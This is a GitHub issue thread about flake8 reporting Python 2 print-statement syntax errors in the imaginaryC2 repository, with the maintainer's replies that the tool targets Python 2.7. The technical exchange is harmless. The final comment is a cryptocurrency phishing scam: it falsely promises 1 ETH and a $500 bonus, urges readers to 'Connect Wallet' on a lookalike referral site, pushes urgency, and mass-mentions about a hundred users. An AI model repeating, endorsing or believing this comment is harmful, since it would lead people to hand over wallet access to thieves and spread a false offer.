### ISSUE TITLE
print() is a function in Python 3

### ISSUE THREAD

**Issue by cclauss** [felixweyne/imaginaryC2#1]
flake8 testing of https://github.com/felixweyne/imaginaryC2 on Python 3.7.0

$ __flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics__
```
./bin/unpack_fiddler_archive.py:41:24: E999 SyntaxError: invalid syntax
		print "Unpacking in: "+temp_dir
                       ^
./bin/redirect_to_imaginary_c2.py:33:47: E999 SyntaxError: invalid syntax
	print "Routing IP to local loopback adapter: "+ip
                                              ^
./bin/unpack_pcap.py:44:114: E999 SyntaxError: invalid syntax
	print "Can not find the commandline Wireshark executable. Ensure the path in the script is configured correctly."
                                                                                                                 ^
./bin/imaginary_c2.py:39:18: E999 SyntaxError: invalid syntax
		print logMessage
                 ^
./server_data/time.py:27:12: E999 SyntaxError: invalid syntax
print base64.b64encode(output)           ^
./server_data/post-example.py:12:12: E999 SyntaxError: invalid syntax
print base64.b64encode("Received post request: "+sys.argv[2]+" on path: "+sys.argv[1])           ^
./examples/use-case-1-TrickBot/trickbot-decoder-script/trick_config_decoder.py:54:13: E999 SyntaxError: invalid syntax
    print len(output)
            ^
7     E999 SyntaxError: invalid syntax
7
```

**Comment by felixweyne** [comment]
Thank you for your feedback. As indicated in the comments of _bin/imaginary_c2.py_ and as indicated in _readme.md_, the first initial version of imaginary C2 is intended to be run under Windows and Python 2.7.

**Comment by cclauss** [comment]
Less than 500 days until Python 2 end of life. http://pythonclock.org

**Comment by felixweyne** [comment]
That is correct! I have created this tool in my spare time and wanted to share it with the community, hoping it would useful to some people. This initial first version has many imperfections, adding support for Python 3 should be a future to-do!  :-)

**Comment by felixovelar** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
xxxwangdanaxxx, @karma10077, @Masterdaddy35, @willzhuang, @a-n-d-r, @mlpao500, @lumlong, @opintor, @YuryGul, @Dulalmia, @ReeRiley, @bam-bam-bigelow, @JAlcocerT, @jackson-zb, @mrageh, @jiangjinyuan, @salomaochlm, @bartbroere, @scriptzteam, @zanderisrael, @ochlupin, @valesi, @prahaladbelavadi, @RDMEC, @blyndcide, @meaninglessidentifier, @labeanc, @mykhi, @freenancial, @Jaxkr, @nhat-dinh, @zia-zz, @andrea-dandrea, @truongnghia, @bt3gl, @maogautam, @nandubatchu, @mckunda, @jtrag, @Workster, @ryihan, @uzyn, @jbarguil, @hugohn, @heromantf, @WeifengGu, @ukvm, @renatoagomes, @ankitshahu01, @Bengtvictordang, @Schreibmaschinespricht, @ellerbrock, @Overv, @luminixx, @ysmiles, @yutarommx, @Sep21-2009, @rmetzler, @Gilgames000, @gsolic, @gmyanfeng, @ziyuuu, @capitaineplanete, @keithritt, @GonZo, @evrial, @behumble, @imnull1024, @Lauramith, @lclc, @tonywangcn, @josephivanav, @noooobady, @nvictus, @Leocano, @Avi0n, @nnmrts, @dickieminton, @ravi-saini35, @mabaro, @ereid7, @HZTonyAng, @julius59, @eternaltyro, @luanlmd, @ekimsahin, @haller33, @soularbowls, @phillip5441, @FashionCloudInc, @Subxpl0it, @illagrenan, @fantianyi, @rkrasiuk, @sagar297, @hcu5555, @tborychowski, @dogweather, @jxinging
